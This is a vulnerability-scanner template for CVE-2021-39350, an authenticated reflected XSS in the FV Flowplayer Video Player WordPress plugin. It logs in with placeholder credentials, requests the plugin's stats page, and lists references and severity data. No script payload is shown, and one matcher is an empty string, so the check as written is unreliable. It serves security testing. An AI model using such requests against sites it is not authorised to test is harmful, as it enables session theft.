id: CVE-2021-39350

info:
  name: FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting
  author: gy741
  severity: medium
  description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file, which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727.
  impact: |
    Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary JavaScript code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39350
    - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-39350
    cwe-id: CWE-79
    epss-score: 0.00104
    epss-percentile: 0.42206
    cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: foliovision
    product: fv_flowplayer_video_player
    framework: wordpress
  tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ""
          - "FV Player Stats"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e9544ea2a99ec897b7871a37a22dbe9bccc8b1ec287bd257eefcd143ba43c9b0022100cdfc5ef7b6494c579c2c558f7ea57a2811e5485f5f62b6070ae617a8b1b94dbd:922c64590222798bb761d5b6d8e72950